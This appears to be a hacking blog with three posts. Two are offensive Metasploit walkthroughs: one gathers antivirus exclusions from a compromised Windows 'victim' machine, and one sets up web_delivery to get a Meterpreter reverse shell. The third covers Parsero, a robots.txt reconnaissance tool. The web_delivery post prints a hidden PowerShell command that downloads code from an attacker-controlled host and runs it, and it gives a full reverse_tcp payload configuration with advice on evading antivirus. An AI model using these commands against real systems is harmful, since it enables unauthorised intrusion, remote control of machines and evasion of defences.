Friday, 15 January 2016
How to Get Antivirus Information from a Remote Victim PC Using Metasploit
Windows Antivirus Exclusions Enumeration
This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently include Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.
Module Name
post/windows/gather/enum_av_excluded
msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > sessions
...sessions...
msf post(enum_av_excluded) > set SESSION <session-id>
msf post(enum_av_excluded) > show options
...show and set options...
msf post(enum_av_excluded) > run
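A minimal end-to-end run might look like this, assuming an existing Meterpreter session whose ID is 1 (the session ID is just a placeholder for your own):

msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > set SESSION 1
msf post(enum_av_excluded) > run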
Thursday, 14 January 2016
Web Delivery Metasploit Script
This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting-language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command themselves, e.g. via command injection, an RDP session, local access, or remote command execution. This attack vector does not write to disk, so it is less likely to trigger AV solutions, and it allows the privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer, or use the SysWOW64 powershell.exe to execute x86 payloads on x64 machines.
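For reference, on 64-bit Windows the 32-bit PowerShell binary lives under SysWOW64, so a hypothetical x86 stager could be launched along the following lines (the URL is a placeholder for whatever web_delivery serves; only the interpreter path matters here):

%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:8080/<uri>')"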
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
...targets...
msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
...show and set options...
msf exploit(web_delivery) > exploit
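As a concrete sketch, a PSH-target run could look like the following; the target ID, payload and LHOST/LPORT values are illustrative assumptions, so verify them with show targets and show options on your own setup:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set TARGET 2
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set LHOST 192.168.1.10
msf exploit(web_delivery) > set LPORT 4444
msf exploit(web_delivery) > exploit

On success, the module prints a one-line command to paste into the victim's shell; once that command runs, a session should come back to the handler.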
Saturday, 8 August 2015
Parsero - reads the Robots.txt file of a web server
Parsero is a free script written in Python which reads the robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines which directories or files hosted on the web server must not be indexed. For example, “Disallow: /portal/login” means that the content at www.example.com/portal/login is not allowed to be indexed by crawlers like Google, Bing or Yahoo. This is how an administrator avoids sharing sensitive or private information with the search engines.
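For instance, a hypothetical robots.txt could look like this (the paths are invented for illustration):

User-agent: *
Disallow: /portal/login
Disallow: /admin/
Disallow: /backup/db.sql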
But sometimes the paths listed in the Disallow entries are directly accessible to users without a search engine, just by visiting the URL and path, while other times they are not reachable at all. Because it is very common for administrators to write many Disallow entries, some reachable and some not, you can use Parsero to check the HTTP status code of each Disallow entry and determine automatically whether these directories are available.
Also, the fact that an administrator writes a robots.txt doesn't mean that the files or directories listed in the Disallow entries will not be indexed by Bing, Google or Yahoo. For this reason, Parsero is capable of searching Bing to locate content indexed without the web administrator's authorization. Parsero checks the HTTP status code of each Bing result in the same way.
Source: https://github.com/behindthefirewalls/Parsero
You can get all the latest info about Parsero from http://www.behindthefirewalls.com/search/?q=parsero
Installing
There are three ways to install Parsero easily.
By using the setup.py script (clone the repository above first)
git clone https://github.com/behindthefirewalls/parsero.git
cd parsero
sudo python3 setup.py install
By using pip3
sudo apt-get install python3-pip
sudo pip3 install parsero
In Kali Linux
sudo apt-get update
sudo apt-get install parsero
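Once installed, a typical run points Parsero at a target and, optionally, asks it to search Bing for indexed Disallow entries (the flags below follow the project README; example.com is a placeholder):

parsero -u www.example.com -sb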